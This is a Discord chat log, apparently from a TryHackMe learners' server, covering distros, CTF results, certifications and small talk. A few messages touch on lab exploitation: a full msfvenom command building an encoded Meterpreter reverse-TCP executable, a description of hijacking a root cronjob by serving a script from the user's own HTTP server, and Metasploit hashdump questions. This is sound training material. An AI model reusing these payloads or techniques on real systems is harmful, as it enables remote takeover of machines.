#general

1 messages · Page 241 of 1

mossy river
#

LMAO

#

Embarassing

boreal scarab
#

There it goes.

sick lance
#

You doing this on Linux?

boreal scarab
sick lance
#

time it

#

Then you'll remember for next time.

boreal scarab
twin ridgeBOT
#

Gave +1 Rep to @sick lance (current: #1 - 2444)

shut hawk
#

Oh you're booting it from a USB?

boreal scarab
#

Yah, live boot Tails, no network connection, no hard drive. And unknown DEFCON 31 USB in the laptop too kekw

sand trench
#

ooooh

#

hope for no firmware bad ness

boreal scarab
#

Was talking to Toaster, it looks to be a grub loader script. I'm checksuming the iso's, see if they've been tampered with

boreal scarab
#

Even so. This laptop is JUST a live boot, for defcon, kinda laptop

sand trench
#

yeah having disposable stuff for defcon sounds sane

slender karma
#

What directional arrow key would we use to navigate down the manual page??

sand trench
#

same way as people recommending having disposable phone and computer for going into china for some reason

sand trench
sick lance
#

don't do this.

sly pilot
#

oh 😦

slender karma
#

I wasnt asking for the answer I was just making fun of the question lol

sand trench
#

most man pages use less as a pager nowadays and that supports vim keys for navigation

lavish star
boreal scarab
#

@sick lance you don't, by any rare chance, have a text document full of checksums, do you?

sand trench
#

so that is how you spell esoteric

lavish star
twin ridgeBOT
#

Gave +1 Rep to @shut hawk (current: #14 - 537)

lavish star
#

for that link

#

sure thank you too Jay

slow helm
shut hawk
#

i have ascended

shut hawk
lavish star
#

tried dcoder, CyberChef

slow helm
#

i mean when you do an http.server with python

#

where is /

lavish star
#

went back to the ftp server and got the file again just to make sure

slow helm
lavish star
slow helm
#

how can i explain it

lavish star
#

is python3 -m http://"ex" port

#

if I am not wrong

sand trench
#

nah it is python3 -m http.server port

#

from there any ip linking to your pc which would be 10.x.x.x

#

for tryhackme works

lavish star
slow helm
#

i hosting an http server
inside the machine there is a cronjob that exute a bash with root priv
and it don't use ip it use a domain
like mkingdom.thm
so i replaced the local host ip with mine

lavish star
sick lance
#

Python3 server for CLI.

Updog for GUI.

molten sky
sand trench
#

so you would then run wget http:/10.x.x.x:8000/listofdirs/file.txt to download files from it

slow helm
#

and it's showing me that the machine is requesting a file

molten sky
slow helm
#

but i don't know where to place it into my machine

sick lance
#

2 way transfer is a massive bonus.

sand trench
shut hawk
slow helm
#

GET /app/castle/application/counter.sh HTTP/1.1" 404 -

sick lance
slow helm
#

i'm hosting the http.sever in the descktop dir

shut hawk
slow helm
#

and there a dir called app/castle/application with a file counter.sh in it

#

GET /app/castle/application/counter.sh HTTP/1.1" 404 -

sick lance
slow helm
#

adn it's showing me this

#

@sand trench

shut hawk
sick lance
#

Incase you post a link in this server and more than one person clicks it.

boreal scarab
#

@cosmic pendant Did checksum:

Kali: Safe
Pentoo: Unknown
Ubuntu GNURadio: Unknown

gray sonnet
#

@boreal scarab check your DM 👀

boreal scarab
#

That Ubuntu GNURadio screams custom, so, checking that as unsafe.

slow helm
#

why i can't cat command a root file when i'm root

sand trench
slow helm
#

and it's permission denied

twin ridgeBOT
#

Gave +1 Rep to @sand trench (current: #4 - 1780)

sand trench
#

use alternatives

slow helm
#

less

#

seems good

gray sonnet
boreal scarab
sand trench
#

because it is the thingy for mkingdom vain

gray sonnet
#

OHH

#

YES!

#

Thanks shadow 😄

sand trench
#

no problems

slow helm
#

its a room

#

called mkingdom

gray sonnet
#

yeah, I remember now

#

screw VMs, I'm going for WSL on my laptop

boreal scarab
#

Damn, pentoo really is elusive. Can't find a sha256 of it. There is an SHA512 on distrowatch, but links to pentoo with a broken link. Download link for that version of pentoo cant be downloaded from pentoo themseleves.....

boreal scarab
faint glen
#

yoo

loud marlin
boreal scarab
#

Nope, atleast for the official download link, only captured once in 2022, and brings you to a "GONE" page

loud marlin
#

if you get sha256 by you own, try google ti

boreal scarab
#

Well good news. I got the DIGESTS from wayback machine. Bad news. I gotta sha512 the iso, not 256

steel steppe
#

lmao just saw it

#

does this server offer Vouchers or giveaways...

loud marlin
#

thm site does

#

giveaways from time to time from users

boreal scarab
# cosmic pendant Nice!

All iso's appear to checkout for sha256/512. Still not touching that with a 10 foot pole, but cool nonetheless!

steel steppe
loud marlin
#

well... you can do free rooms and so

steel steppe
#

kinda tryna continue the red team course

pallid lotus
sick lance
pallid lotus
#

Nah kekw
System at uni

loud marlin
pallid lotus
#

It was set up up by a former student when the lab was redone, presumably as a laugh lmao

loud marlin
pallid lotus
#

So, TL;DR: the main NAS for that course... Ran on Hannah Montana Linux

#

NetBIOS name was HANNAH as well lmfao

loud marlin
#

i ahve it in VM. you even can't update/upgrade it any more

pallid lotus
#

Doesn't surprise me

#

It's an ancient Debian fork iirc

loud marlin
#

i think is 8.4 iirc

molten sky
#

muiri! you're blue!

pallid lotus
# naive violet Lab-prod?

I mean, it hosted all the coursework and downloadable contents, and wasn't in scope for any attacks, so I'd call it prod prod

molten sky
#

you're blurple! *

pallid lotus
#

It did live in the lab network though

loud marlin
naive violet
pallid lotus
#

Oh Lord no Kekw

#

Well, business critical to that one course tbf. The lecturers would have a bad day if it went down.
Not to the overall org though.

slender karma
#

whats better blackarch or kali

loud marlin
#

kali

slender karma
#

why

loud marlin
#

well... at last it's ppl most choice os

sand trench
#

hmmmmm weird problems hmmmm

loud marlin
# slender karma why

it have all the tools you need for most of the time, and if you get full iso of alike 10gb you have all the tools

rapid merlin
sand trench
#

thingy works in terminal

#

thingy not work in lf

#

shadow dunno why

loud marlin
fresh granite
sand trench
#

missed the --polite on flag

loud marlin
sand trench
#

apparently a chafa update made it require that to work in lf

#

blackarch is a mess with some updates and handling of some of the tooling

boreal scarab
slender karma
#

do I add -R after rm only when I want to remove a directory?

sand trench
#

they tried for a bit in a vm

fresh granite
sand trench
#

after dealing with how they handle impacket

#

never again

boreal scarab
#

Pentoo!

gray sonnet
#

that was a quick trip down memory lane

#

I died when installing black arch...then died the second time when trying to figure it out, then died the THIRD time when trying to use it

boreal scarab
#

When you clean out recycling of 86GB worth of files. And your C drive goes from 5 GB to 19 GB.... yah, math checks out SureBruh

loud marlin
#

i got one screw extra after assembly =/

boreal scarab
loud marlin
boreal scarab
#

Welp, time to try out pentoo

fresh granite
gray sonnet
sand trench
#

huh apparently something is whacky with tmux and chafa sixels inside of lf

#

some images don't show up

#

no major issues

gray sonnet
#

anywho, I'm gonna hop off ya'll, have fun!

sand trench
#

have good sleepies vain

boreal scarab
#

Hello Pentoo

sand trench
#

is pentoo gentoo with pentester tools???

loud marlin
#

hello

cold jungle
#

Anyone having any idea why am getting error running hashdump?

#

Am I supposed to pass any argument?

loud marlin
#

is it run must be there

cold jungle
#

And why does hashdump --help give me hash value

#

?

clear jackal
#

Is this for a THM room?

cold jungle
cold jungle
#

As I have solved the question of room

#

I am asking out of curiosity

clear jackal
#

Have you conducted a query utilizing your favorite search engine?

cold jungle
#

I did found this but didn't understand it fully

clear jackal
#

Because I found potential solutions that may answer your questions

boreal scarab
#

I hate gentoo, sooooo much

#

Jesus, no systemctl, uses rc-service. And portage... over apt, dnf, pacman

clear jackal
# cold jungle Please share

I'm trying to get you to conduct research. I googled the exact error shown in your screenshot and information is popping up.

cold jungle
#

Instead I googled hashdump docs

#

So that I could understand how it funciton

#

And found the link I shared above

boreal scarab
#

I'll give pentoo this, it's colorful. But commands... 🤮

cold jungle
#

There is some github results about the same... But it seems like they are way too professional for me to understand their conversation

buoyant tree
#

Hullo

cold jungle
#

Is there any chance you can summarize or help me with other resources... Am not being lazy I spent hours solving the room question and then I asked you this after I solved it because I couldn't find any good resources

white maple
#

Anyone else facing issues with burp browser on Ubuntu 24.04?

clear jackal
cold jungle
#

But am still getting this error

clear jackal
#

Did you do msfupdate?

cold jungle
#

Also when I looked for help I got hashes

#

Which was the ans of the room question actually

#

Which is quite weird in my opinion

cold jungle
clear jackal
#

I don't know what version of metasploit they're running. It can't hurt to run it

clear jackal
sand trench
clear jackal
boreal scarab
cold jungle
boreal scarab
tulip nacelle
#

what distros do y'all use and if so why?

sage schooner
#

afternoon hackers, how is the learning going?

sand trench
sage schooner
shut hawk
boreal scarab
tulip nacelle
boreal scarab
#

Ayyyy let's gooo, lynis is installed. Now let's see what it ranks for pentoo

sage schooner
#

who won the google ctf yesterday?

shut hawk
#

there's still 36 minutes left

#

currently its kalmarunionen

boreal scarab
#

63 lynis score on Hardened pentoo

sand trench
shut hawk
sage schooner
boreal scarab
#

Breh... there's a team called "Google only hires skids"
They're ranked 37 with only 7 flags kekw

molten sky
tulip nacelle
sage schooner
loud marlin
#

true. is rly run great in general

chilly veldt
#

48 hours almost done

#

brain is deaaaad

loud marlin
#

no sleep ?

sage schooner
#

you can do it!

tulip nacelle
#

what are we talking ab?

sage schooner
tulip nacelle
#

is it stable or bleeding edge?

boreal scarab
tulip nacelle
#

stable prolly ye?

tulip nacelle
boreal scarab
#

@loud marlin get on my level

tulip nacelle
#

i've transitioned from win like a month ago

sage schooner
tulip nacelle
#

my dream is to be able to set up gentoo in like 6 months

#

when i learn how the linux system works

boreal scarab
tulip nacelle
#

btw how do i verify myself?

sharp citrusBOT
tulip nacelle
#

ty ty

boreal scarab
#

Alright. I love pentoo. Still hate how to install and update it, but it's got ghidra and Terminator on here by default. AND Yubikey manager pepe_pog

tall forum
#

/verify token

tulip nacelle
#

something for everyone

tall forum
#

Excuse me, is this an update, I don't understand how to answer this question

clear jackal
slow helm
#

hey guys

slender karma
#

how much knowledge should you have before playing king of the hill?

slow helm
#

why i have this in my openvpn file

#

WARNING: this configuration may cache passwords in memory -- use the auth-nocache option to prevent this

slender karma
clear jackal
#

It may not be fun in the beginning, but it will expose you to different content rather quickly.

clear jackal
slender karma
#

is there another learning path after the "Pre Security" ?

chilly veldt
#

just some sickness arriving as well

clear jackal
chilly veldt
#

and body breaking down due to overused

slender karma
loud marlin
slender karma
boreal scarab
loud marlin
boreal scarab
#

Look at this nano!

#

Look how pretty it is!

clear jackal
sand trench
#

YAY new catppuccin colloid version working just perfectly

sand trench
boreal scarab
clear jackal
#

Like I said, you can go do it now, you probably won't win but you will gain some level of knowledge through participation.

slender karma
#

alright

gray sonnet
sand trench
#

emulators are nice but dumping games yourself is hard and the only legal way

chilly veldt
polar wraith
#

i can send friend requests on thm now??

sand trench
boreal scarab
#

Zsh, with gnome, noice

sick lance
polar wraith
gray sonnet
polar wraith
#

i dont see the friend request thing

chilly veldt
buoyant tree
gray sonnet
#

it's 2 years old, and I got it used

#

for college

sand trench
polar wraith
#

what are friends able to do

gray sonnet
#

anything I can hack on and take notes, and meet all class requirements is good

slender karma
#

I just tried to join a public game and it said " Only intermediate and advanced experienced leveled users can play King of the Hill."

when do I get that "title" of an advanced user ?

sand trench
gray sonnet
#

I have another PC for that haha

#

built it last month

chilly veldt
#

T-6 minutes psyDuck

pine stratus
#

who knows the game agario kekw

gray sonnet
#

took bella's suggestion and went with a 4070

sand trench
buoyant tree
buoyant tree
chilly veldt
#

yeee

slender karma
chilly veldt
gray sonnet
buoyant tree
gray sonnet
#

ranking up

chilly veldt
gray sonnet
twin ridgeBOT
#

Gave +1 Rep to @chilly veldt (current: #7 - 846)

buoyant tree
gray sonnet
#

👀

chilly veldt
gray sonnet
sand trench
#

shadow is planning on going for a 7900xtx as their gpu

gray sonnet
#

gotta get a compressed air blower soon so I can start cleaning my PC properly

gray sonnet
sand trench
slender karma
#

I feel lost honestly I see other people using kali and some tools and I cant imagine myself doing all of that. yes, Im a beginner and I cant just understand everything right away but Im still unsure if tryhackme is actually a good resource to learn ethical hacking

sand trench
gray sonnet
#

ah, AMD would be the better option

#

ooh, yeah

#

pretty cheap at 5$ a pop

#

pretty big for 5$

buoyant tree
#

shadow, you ever considered making your own distro

sand trench
#

i.e a can of compressed air has limited useage time

gray sonnet
#

wait...that's a leaf blower...

sand trench
#

a handheld electric blower can blow tons more air before it breaks down

gray sonnet
#

aye

buoyant tree
sand trench
buoyant tree
gray sonnet
#

well, leaf blower works too kekw

sand trench
gray sonnet
#

I'm on windows for a while

#

using WSL with kali and kex

buoyant tree
# gray sonnet well, leaf blower works too <:kekw:658061932577816606>

Carey uses an electric leaf blower to blow out a PC covered in years of dust!

Please join my Facebook fan page:
https://www.facebook.com/careyholzmanfanpage

See more of Carey's video's here:
http://www.CareyHolzman.com

For collaborations and business inquiries, please contact via Channel Pages: http://ChannelPages.com/CareyHolzman

▶ Play video
gray sonnet
#

if it works out, I'll stay on windows

slender karma
gray sonnet
#

if not I'll have to switch to linux soon

gray sonnet
#

I'm definitely getting a leaf blower

sand trench
buoyant tree
sand trench
#

well they work

#

a compressor could also work if you need lots of air at pressure

slender karma
#

I just wanna know if Im gonna see results if I just do it

gray sonnet
slender karma
#

for at least a month

gray sonnet
#

I tend to scroll past anything that is not yellow or directly underneath my message kekw

sand trench
buoyant tree
silver ember
#

Hi there hackerz. Do we have the ability to share open source projects that we want to test out so that you can try hack them? Cause that would be aweome!

gray sonnet
#

default is no ping and just reply?

buoyant tree
#

depends

loud marlin
buoyant tree
#

sometimes it does, sometimes it doesn't

gray sonnet
#

Hmm

buoyant tree
#

Thought it was a movie word

sage schooner
loud marlin
slender karma
buoyant tree
#

and tell results

sage schooner
buoyant tree
#

would it even survive

sand trench
loud marlin
sand trench
#

the major problem with using a computer that you put in liquid nitrogen is the problems of condensation water droplets

slender karma
sand trench
#

learning linux good enough to use it only took shadow a month

#

to learn a lot more in depth took longer

flint lintel
#

I am doing the THM stuffs on ubuntu so that I learn linux too along the way

sage schooner
# slender karma can you fully work with linux and use hacking tools?

yeah I mean I know my cat, ls, whoami and how to install stuff, not going to lie when it comes to using tool on a terminal I still have cheat sheets and right now I am comfortable with Burp Suit also, so hopefully with a sec+ cert I might be knowledgable enough for a jr position.

slender karma
loud marlin
#

yep. the issue is condensation. even if you use ammonia. you need to be inside dry enviroment and that any cooling liquid do not flow outside

#

so called closed system

sand trench
slender karma
sage schooner
slender karma
#

have you been consistent the whole time and made your best or was cybersecurity like your side hobby?

sage schooner
flint lintel
#

What is this error?
Error: Permission denied @ rb_sysopen /home/user/THM/shell .exe

Got this when trying to generate a payload with msfvenom, (even with root permissions)

#

I asked chatGPT and all it says is that its a file access error in ruby..

sand trench
#

i.e there should be no space between shell and .exe

flint lintel
#

The original command had no space. I got the space from the "text extractor" tool that I copied the text from.

sand trench
#

then it might be that your user is not named user

flint lintel
#

Yes, its named my name. I replaced it with user for privacy reasons.

#

The exact command I used:
sudo msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.13.**.*** LPORT=5566 -f exe -o /home/*****/THM/rshell.exe

#

[ I added the *** myself on discord. ]

sand trench
#

¯_(ツ)_/¯

barren lantern
#

Hello 👋

flint lintel
barren lantern
#

Just noticed I forgor to link my account xD

flint lintel
valid mauve
#

This is train restaurant service.

barren lantern
loud marlin
flint lintel
#

didn't know you could do that

shell nova
flint lintel
barren lantern
valid mauve
shell nova
lament tendon
valid mauve
barren lantern
flint lintel
shell nova
#

Also vanity roles

valid mauve
# lament tendon Denmark?

Nah, from ... Prague, maybe? I'm unable to figure out where EC172 started its journey from right now, but the comfort is something rlse.

barren lantern
lament tendon
#

EC172 is hungarian.

#

Where the heck are you going?

chilly veldt
#

That train service is not Danish lmao

cold jungle
#

Hey, there is some path missing on THM from what Shadow has pinned here

#

Any idea why?

lament tendon
#

Some paths were added to THM after that message was pinned.

cold jungle
#

Am saying some are actually not available on THM

#

And is pinned here

lament tendon
#

At least as long shadow hadn‘t had pinned yet another one.

clear jackal
#

Which path?

cold jungle
#

Pentest plus

#

I couldn't see it

chilly veldt
#

You know life is good when Ctftime is saying nr 1

shadow loom
chilly veldt
#

Been since '22

shadow loom
#

Cool

chilly veldt
#

Thanks

shadow loom
#

I joined thinking it was more than a CTF team then I kinda abandoned it when I realised it was just that 😂

clear jackal
cold jungle
chilly veldt
shadow loom
#

Yea

clear jackal
chilly veldt
valid mauve
#

Kaiserschmarrn!

#

On a train!

#

And it tastes fucking good too!!

cold jungle
shell nova
shadow loom
clear jackal
chilly veldt
molten sky
#

comptia is the organization pentest+ is the cert

shadow loom
valid mauve
#

Heheheeheh

#

And all for 8,70€, which is cheap for nearly 2L of beer.

cold jungle
barren lantern
valid mauve
# shell nova Very

Total meal with beer and goulash soup and Kaiserschmarrn ran me 20€.

I am used to paying about the same for far worse quality with Deutsche Bahn.

Oh, and the plates were served. No bistro bullshit like ICEs. 😄

crude stump
#

Hi

barren lantern
#

👋

#

Time to setup a new thm vm 👍

shadow loom
twin ridgeBOT
#

Gave +1 Rep to @valid mauve (current: #65 - 110)

shadow loom
boreal scarab
#

@blazing granite translator!

boreal scarab
#

I love my KDE Plasma

high mulch
#

uboonga

sand trench
#

shadow is too deep down the linux rabbit hole and is now mainlining window managers

blazing granite
# boreal scarab

the black letter on the yellow background it says spring, it's not a translation actually says spring in hebrew letter 🙂 the other line on the bottom is the flavour and says grapes

sand trench
#

boing boing boing goes the springs

#

or are they more like slinkies????

boreal scarab
#

Have fun!

blazing granite
boreal scarab
#

I know that, that's nutrition facts, I just csnt read it. And frankly don't care what it says kekw

blazing granite
# boreal scarab

the first one on the circle it says that doesn't contain any additives, the second one is nutritional info and the content that is 330 ML

boreal scarab
sand trench
#

point 3 repeating or shadow walk

tepid furnace
#

Non english

blazing granite
tepid furnace
#

The can kinda reminds me of fanta

boreal scarab
twin ridgeBOT
#

Gave +1 Rep to @blazing granite (current: #73 - 86)

clear jackal
#

~12oz

blazing granite
sand trench
clear jackal
shell nova
clear jackal
sand trench
#

330 milliliters ≈ 11.15862749 fl_oz

clear jackal
#

Also rounding lol

shell nova
#

12 oz is 355 ml

shell nova
blazing granite
sand trench
#

¯_(ツ)_/¯

shell nova
#

(they aren't the same)

shell nova
#

3/4 US pint

clear jackal
chilly veldt
#

Welp, train is delayed, we are waiting on an ambulance

shell nova
high mulch
#

what the f-- is a kilometer?! HWAAAAAK 🦅 🇺🇸

sand trench
clear jackal
blazing granite
chilly veldt
chilly veldt
boreal scarab
#

@blazing granite very... watery? But also quite grapy. It doesn't sit on your tongue, so the flavor is when you take the sip

blazing granite
boreal scarab
#

It's so hard to describe

sand trench
#

cross over to the other side == dead

blazing granite
boreal scarab
#

Also

sharp citrusBOT
boreal scarab
#

If you setup different DNS on your router's LAN connection, then yes. If not, it uses your router's IP as it's DNS

shadow loom
#

Yes

sly pilot
#

@nimble timber i got it nice trick for the root 😉

boreal scarab
#

I have a PiHole, so on my router's UI in LAN, I have my PiHole's IP and Quad9 as backup. But you can also specify what DNS you want to use, either in windows or linux

sand trench
#

and without changing basically any router config for dns the router uses your isp:s dns server most of the time

boreal scarab
#

Yes. If you specified another one in your router's UI, on windows, or linux

shadow loom
#

"Ooh shiny" mixed with frequent rewards for that sweet dopamine boost

#

Can confirm

boreal scarab
#

.... damn pentoo really is locked down, can't even use pip to install pwncat-cs

shut hawk
#

ahh, powershell vs bash

twin ridgeBOT
#

Gave +1 Rep to @sly pilot (current: #2107 - 1)

boreal scarab
#

Bruuuuh. Follow Gentoo's instructions to setup a virtual environment to install pwncat-cs and it's giving me the same crap paradox

#

What's it related to?

shadow loom
#

Better question is why do you think it might be D?

boreal scarab
#

What do YOU think it is?

tepid furnace
shadow loom
#

I guess.. I use the two interchangeably

sand trench
#

tries to only use copyleft things

shadow loom
#

Domain Name Service/Server. I think it's Service, but ye.. DevOps be lazy

tepid furnace
#

source image for that btw

#

flashcards would be helpful for you if its just memory stuff like that

mossy river
#

Minecraft hardcore world where when one person dies it ends lool (Explicit Language)

sand trench
shadow loom
#

Think about the time series of events that happen when you plug in an ethernet cable

sullen hearth
#

A ...but u got it?

tepid furnace
#

goated

shadow loom
#

If your PC knows nothing, it will need an IP and also DNS and other things

#

It can't get a DNS address from a DNS because well it doesn't know where to find one

#

So it would have to get that info from DHCP

sand trench
#

or have you manually asign it

sullen hearth
tepid furnace
#

jarvis change his host file to redirect to bing instead of google

shadow loom
#

Exactly 😄

sand trench
tepid furnace
#

obviously

#

but jarvis isnt real

sand trench
#

as both services have tons of ip:s used depending on your region in the world

mossy river
#

we spent a total of an hour looking for a nether fortress

sand trench
#

can shadow have a glass of cranberry juice instead???

tepid furnace
#

fr?

mossy river
#

hence the pain in my "nooo"

tepid furnace
#

sprechers rootbeer ontop

sullen hearth
shadow loom
#

Good luck pepeJAM

sand trench
shadow loom
#

Can I ask, @rapid merlin.. Are there any specific reasons you're doing A+?

twin ridgeBOT
#

Gave +1 Rep to @shadow loom (current: #397 - 12)

sand trench
#

it tasty

shadow loom
#

Gotcha

#

Well glhf.. Feel free to ping/DM if you think I might know the answer

sullen hearth
#

You work for (if you r not cheating on thm server ^^ ) so you deserve it

shadow loom
#

I never did it myself so I can't help with the exam specifics, but the theory I believe I've got a fair grasp of

sullen hearth
#

No. I was jokin' . It has nothing to do with you or your level.

#

I hunt certs as well cuz i have no degree or something like that.

shadow loom
#

In all fairness progressing at THM is fairly easy so don't be disheartened

sullen hearth
#

Thats even worth a beer 😂👍

shadow loom
#

(Rank 3 to 4 is like one hard challenge and an easy)

pallid lotus
#

You mean you haven't tried that to see definitively?

#

It's very funny

pallid lotus
#

That's literally how long it took me back when there were only 70 odd rooms kekw

#

If that

shadow loom
pallid lotus
#

You seen the buzz light-year meme of that? kekw

shadow loom
#

No

pallid lotus
#

Will try to find it for ya

shadow loom
#

We weren't allowed to make fun of THM remember

#

😂

#

(Or rather I/we didn't allow it)

shut hawk
pallid lotus
#

There's a better one than this
Same format though

shadow loom
#

HAHAHAHAHA

pallid lotus
#

That's the one kekw

shadow loom
#

HAHAHAHAHA 😂 😂 😂 😂 😂

sullen hearth
#

Yes we all heros cuz of nmapping nasa but the girl don't care 🤣

shadow loom
#

AMAZING kekw kekw kekw

shut hawk
# shut hawk

im biased, but I think the no text at the bottom makes it funnier :P

pallid lotus
#

Lotta props to THM otherwise, but the ranking system isn't the most relevant in the world kekw

sullen hearth
boreal scarab
#

@royal gazelle Hey, coming to Defcon this year?

shadow loom
#

If they allowed you to sort the ladders by "points/rooms" it would be more relevant

pallid lotus
shadow loom
#

There are people in the top-50 list with 200 fewer rooms solved than the number 1

#

Or something along those lines

#

But IMHO that's more impressive because "points per room" is higher then

pallid lotus
#

That and there's a tonne of bots + users who never actually do anything

#

Or, were, once upon a time. Dunno if that's still the case

shadow loom
pallid lotus
#

I'd say look at the forum, but they nuked that a while back. Used to be chockablock with spam comments

#

These days if you wanna express yourself you gotta do it with your annual activity heatmap

shadow loom
#

Because they can claim to be top X % in the world and get a job

#

Or they hope to be able to..

shut hawk
#

I think THM made a small change that means in order to count to the % you have to have solved at least X rooms (to prevent against bots)

#

Not sure how much of a dent that made

shadow loom
#

You need 100 points IIRC

sullen hearth
#

Noooo. I would fall back to 10000 🤣🤣

shadow loom
#

Or wait, to get a pct? Yeah dunno, but more than that

pallid lotus
shadow loom
#

Muiri which of your Chinese New Year boxes should I do first?

pallid lotus
boreal scarab
#

Pentoo... the only damn OS that you need to setup a python virtual environment to use pip... paradox

pallid lotus
#

Jellyfish is the best imo, probably followed by Dog, then Pig

shadow loom
pallid lotus
#

Yeah, it's CTFy bullshit from before I knew what the difference was kekw

sullen hearth
#

No. It's a great platform and idc bout rankings but there a companys out there where you can say "I do try hack me" cuz the know its great for fundamentals.

shut hawk
#

keep your environments in check

#

pipx is also a thing

shadow loom
boreal scarab
pallid lotus
#

Yeaaaaaap. Fox isn't much better. That's a sadistic one

#

Pig is getting there, Dog I actually still kinda like, and Jellyfish is okay (imo)

mossy river
shadow loom
#

mkingdom was juuuuust enough CTFy for me... More than that and it just becomes a bother for the sake of pranking the user

pallid lotus
#

I've not released any of the new ones publicly though 😦

pallid lotus
shadow loom
mossy river
pallid lotus
#

That one was deliberately built to be as irritating as possible because it was part of a competition and we wanted to draw it out for as long as possible

#

There are.. better strategies kekw

shut hawk
#

make a "year of the rat" 😛

shadow loom
boreal scarab
pallid lotus
shut hawk
shut hawk
shadow loom
#

Just like Waltzer from HTB... "GUESS THE ALGORITHM x3" crap

pallid lotus
shadow loom
#

God I still hate Waltzer...

#

Even after all these years

sullen hearth
#

Are u from europe?

pallid lotus
shadow loom
pallid lotus
#

So my knowledge base is trilium, but pentests, CTFs, dev work, etc, are cherry tree

shut hawk
#

Ah fair enough

#

any particular reason why?

pallid lotus
shut hawk
#

After that skull crushing windows issue? 😂

#

I only got initial access to the first stage, didn't go further

pallid lotus
# shut hawk any particular reason why?

I like to keep things compartmentalised. My main notebook is way too big to fit in a cherry tree file now -- that's the only reason it's different. I just really dislike mixing things together.

shut hawk
#

Got ya, understandable

sullen hearth
#

Unfortunately i got no room for you but u remind me of my tasks

pallid lotus
#

For reference @shadow loom, I built Gauntlet about three years ago. It's a pivoting challenge, primarily. A docker network with 6 layers in it, each harder than the last (following the video game Gauntlet Boss format), but actually using realistic movements and LPEs

shut hawk
#

It's funny, I still remember the exact exploit - when I was developing my own program with that lib, my brain immediately went back to it 🤣

pallid lotus
#

No one has every got past the initial access to the first container.

#

And only about three people have got that far, Jayy being one of them

shadow loom
#

SQL injection leading to abuse of PL/SQL stored procedures to enable a test instance of an API which leads to RCE as an unpriv user in Windows with Defender for Endpoint enabled and fully patched and then some easy to locate but hard to pull off obscure privesc
@pallid lotus

pallid lotus
#

... We've brought it back for three consecutive years at the conference kekw

pallid lotus
#

PWK for me

shadow loom
#

No I just made it up

#

Year of the Birbs, when?

pallid lotus
#

Wdym? That makes sense

#

PEN-200 or whatever they call it now. OSCP coursework

shadow loom
#

Same for me ^

quartz fog
#

I'm looking forward to the exploit development room, ive gotten most of the way there, its just the last part i need help with

shadow loom
#

But I never got further than stack based BOFs

pallid lotus
shadow loom
#

My life was too short, I thought to my self

pallid lotus
#

That one actually sounds fun, although you'd struggle to get MDE on a CTF box kekw

shadow loom
#

True

shut hawk
#

Could do like a parrot that echo's stuff back to you and somehow abuse it to echo bad stuff

shadow loom
#

Aight, Noah bedtime... Back in a bit

shut hawk
#

...yeah I just realised that is exactly what it sounds like LOL

pallid lotus
#

Done way too many of those recently

shadow loom
#

ParrotAI

#

OH I GOT IT MUIRI

shut hawk
shadow loom
#

You need to train your own LLM for us to hack

#

It'll be fun

#

Maybe slightly expensive...

#

BUT FUN

shut hawk
#

good night

sand trench
#

well ollama should be installable on vm:s and can probably ship on a tryhackme target machine

#

dunno how you would exploit it though

pallid lotus
sand trench
#

so sure can take that bet

#

what do you wanna bet for it???

pallid lotus
#

Well that I need to look into

sand trench
#

might not run fast or very well but would assume they can run

pallid lotus
#

That said, are we talking a Pi 0 or a Pi 5 with 8Gb RAM

sand trench
#

was thinking pi 4 with 4 gb ram

chilly veldt
#

Finally at my train station 27 minutes late

pallid lotus
sand trench
sand trench
pallid lotus
#

t2.nano free, t2.micro sub, unless that's changed

blazing granite
sand trench
#

also if shadow recalls correctly during advent of cyber 2023 there was a "chatbot" that we got to hack

#

not a very good one

shut hawk
#

there was, it wasn't an language model though

sand trench
#

¯_(ツ)_/¯

#

guess shadow can claim that muiri beat the bet

#

so here is a cooctus for muiri

boreal scarab
#

@chilly veldt Soooooo. Whatcha win?

sand trench
#

yes it is possible.... though no idea how hard it would be and what would be required to get there

chilly veldt
chilly veldt
#

And I got work tomorrow

boreal scarab
chilly veldt
sand trench
#

bella getting a job at google after winning google ctf???

chilly veldt
#

No

shut hawk
chilly veldt
boreal scarab
#

No as in, it's not an option, or no, you wont even think about the offer?

chilly veldt
boreal scarab
chilly veldt
sand trench
#

yes and they are not the only huge corpo doing it

chilly veldt
#

Yes, they do, they have a beginnersquest, yearly CTF and hackceler8 and also v8ctf

#

V8ctf is a 0day CTF on their browser engine

chilly veldt
#

Jeopardy themed

chilly veldt
# shut hawk Ahh I see

Only 4 players allowed to be onsite, but we plan on going there as the team cause we didn't qualify for Defcon this year

boreal scarab
#

To all the Scandanavians, Skål!

chilly veldt
#

Hackceler8? Yes, if you click the back button on beginners quest site I sent, and press "hackceler8" there's videos from last year's competition

#

Hackceler8 is the CTF finals that google has made, it's a game hacking finals that runs in a football tournament style, with 8 teams playing some qualification rounds, then its bracket style

sand trench
boreal scarab
chilly veldt
#

Akvavit*

boreal scarab
twin ridgeBOT
#

Gave +1 Rep to @chilly veldt (current: #7 - 847)

boreal scarab
#

Yup, that akvavit hit hard. Been awhile since I had it

sand trench
#

how high alcohol %

#

also where kopparberg cider

boreal scarab
boreal scarab
sand trench
boreal scarab
sand trench
#

???

#

ping ping??

boreal scarab
#

(Updated to better quality photo)

#

That's why the double ping

sand trench
#

oki

boreal scarab
jagged moon
#

.

#

Roles, pls!

#

Oscp, osep, oswe

shell nova
#

hey Fluff

jagged moon
#

I did it!!!

shell nova
#

grats

twin ridgeBOT
#

➕ Gave the role OSCP to sofluffy

#

➕ Gave the role OSWE to sofluffy

sage schooner
#

cgrats!

boreal scarab
twin ridgeBOT
#

➕ Gave the role OSEP to sofluffy

shell nova
#

wb, btw

boreal scarab
#

@shut hawk FLUFF IS BACK!

clear jackal
barren lantern
jagged moon
#

No emeritus?

shell nova
#

those got wiped a short while ago

shut hawk
#

Legend role

twin ridgeBOT
#

➕ Gave the role Community Legend to sofluffy

boreal scarab
#

No more Emeritus, community legend though

shell nova
#

can give that one

jagged moon
#

Cm could be nice, if i am not stripped of that

shell nova
#

normally not

shut hawk
#

Welcome back 🤗

twin ridgeBOT
#

➕ Gave the role Community Mentor to sofluffy

boreal scarab
#

I had Community Mentor too Hydra Kappa

shell nova
#

no you didn't

jagged moon
#

Cheerio!

boreal scarab
#

Atleast I tried kekw

boreal scarab
sage schooner
#

Fluff Clan rejoice.

keen flax
#

I do not have that sort of skill

sand trench
#

music times

chilly veldt
#

Me: has a really bad cough
"Hmmm, what can help"
Looks at the 2.5 packs of MREs I just got home
"Oh wait, instant soup!"
Drinks instant soup at 1 am

rustic shell
#

Hello im trying to connect to the lab via openvpn and it does not connect

